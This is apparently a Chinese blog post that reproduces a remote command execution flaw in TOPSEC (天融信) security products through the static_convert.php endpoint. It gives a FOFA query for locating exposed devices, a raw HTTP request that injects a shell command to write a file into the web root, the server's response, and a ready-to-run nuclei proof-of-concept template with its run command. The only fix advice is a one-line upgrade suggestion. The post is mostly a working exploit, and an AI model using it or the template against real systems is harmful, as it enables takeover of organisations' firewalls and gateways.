【漏洞復(fù)現(xiàn)】天融信TOPSEC static_convert 遠(yuǎn)程命令執(zhí)行漏洞

沖天香陣 2024-01-03 發(fā)布于甘肅

展開全文

免責(zé)申明：本文內(nèi)容為學(xué)習(xí)筆記分享，僅供技術(shù)學(xué)習(xí)參考，請(qǐng)勿用作違法用途，任何個(gè)人和組織利用此文所提供的信息而造成的直接或間接后果和損失，均由使用者本人負(fù)責(zé)，與作者無關(guān)！！！

福利：小編整理了大量電子書和護(hù)網(wǎng)常用工具，在文末免費(fèi)獲取。

—

漏洞名稱

天融信TOPSEC static_convert 遠(yuǎn)程命令執(zhí)行漏洞

—

漏洞影響

天融信TOPSEC

—

漏洞描述

天融信TOPSEC解決方案包括綜合管理系統(tǒng)，各類安全產(chǎn)品如防火墻、VPN、安全網(wǎng)關(guān)、寬帶管理、入侵檢測(cè)、內(nèi)容過濾、個(gè)人安全套件以及綜合安全審計(jì)系統(tǒng)等多種安全功能。該系統(tǒng)static_convert.php接口處存在RCE漏洞，會(huì)導(dǎo)致服務(wù)器失陷。

—

FOFA搜索語句

app='天融信-上網(wǎng)行為管理系統(tǒng)'

—

漏洞復(fù)現(xiàn)

向靶場(chǎng)發(fā)送如下數(shù)據(jù)包

GET /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20%20echo%20'pstvamqlkzrgslfilwvf'%20>>%20/var/www/html/rrlmkkyopirhaviko.txt%0A HTTP/1.1Host: 192.168.40.130:8443User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36

響應(yīng)內(nèi)容如下

HTTP/1.1 200 OKX-Powered-By: PHP/7.2.5Content-Type: text/html; charset=UTF-8Date: Wed, 27 Dec 2023 03:20:53 GMTServer: lighttpd/1.4.49

ip -6 neigh del || echo 'pstvamqlkzrgslfilwvf' >> /var/www/html/rrlmkkyopirhaviko.txt0ip -6 neigh add || echo 'pstvamqlkzrgslfilwvf' >> /var/www/html/rrlmkkyopirhaviko.txt0

第二步，訪問回顯文件

https://192.168.40.130:8443/rrlmkkyopirhaviko.txt

漏洞復(fù)現(xiàn)成功

—

nuclei poc

poc文件內(nèi)容如下

id: topsec-static_convert-rce
info:  name: 天融信TOPSEC static_convert 遠(yuǎn)程命令執(zhí)行漏洞  author: fgz  severity: critical  description: 天融信TOPSEC解決方案包括綜合管理系統(tǒng)，各類安全產(chǎn)品如防火墻、VPN、安全網(wǎng)關(guān)、寬帶管理、入侵檢測(cè)、內(nèi)容過濾、個(gè)人安全套件以及綜合安全審計(jì)系統(tǒng)等多種安全功能。該系統(tǒng)static_convert.php接口處存在RCE漏洞，會(huì)導(dǎo)致服務(wù)器失陷。  metadata:    max-request: 1    fofa-query: app='天融信-上網(wǎng)行為管理系統(tǒng)'    verified: truevariables:  file_name: '{{to_lower(rand_text_alpha(6))}}'  file_content: '{{to_lower(rand_text_alpha(15))}}'requests:  - raw:      - |         GET /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20%20echo%20'{{file_content}}'%20>>%20/var/www/html/{{file_name}}.txt%0A HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
      - |        GET /{{file_name}}.txt HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
    matchers:      - type: dsl        dsl:          - 'status_code_1 == 200 && status_code_2 == 200 && contains(body_2, '{{file_content}}')'

運(yùn)行POC

nuclei.exe -t mypoc/天融信/topsec-static_convert-rce.yaml -u https://192.168.40.130:8443

—

修復(fù)建議

升級(jí)到最新版本。

—

福利領(lǐng)取

關(guān)注公眾號(hào)，在公眾號(hào)主頁點(diǎn)發(fā)消息發(fā)送關(guān)鍵字免費(fèi)領(lǐng)取。

后臺(tái)發(fā)送【工具】獲取滲透工具包

后臺(tái)發(fā)送【電子書】獲取電子書資源包

本站是提供個(gè)人知識(shí)管理的網(wǎng)絡(luò)存儲(chǔ)空間，所有內(nèi)容均由用戶發(fā)布，不代表本站觀點(diǎn)。請(qǐng)注意甄別內(nèi)容中的聯(lián)系方式、誘導(dǎo)購(gòu)買等信息，謹(jǐn)防詐騙。如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容，請(qǐng)點(diǎn)擊一鍵舉報(bào)。

轉(zhuǎn)藏 分享

QQ空間 QQ好友新浪微博微信

獻(xiàn)花（0） +1

來自：沖天香陣 > 《漏洞》

舉報(bào)/認(rèn)領(lǐng)